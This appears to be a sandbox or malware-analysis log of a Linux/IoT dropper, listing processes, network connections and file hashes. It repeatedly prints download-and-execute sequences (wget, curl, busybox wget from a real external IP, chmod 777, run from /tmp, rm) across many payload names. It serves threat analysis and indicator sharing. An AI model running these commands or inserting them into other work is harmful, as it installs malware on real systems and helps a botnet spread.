[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97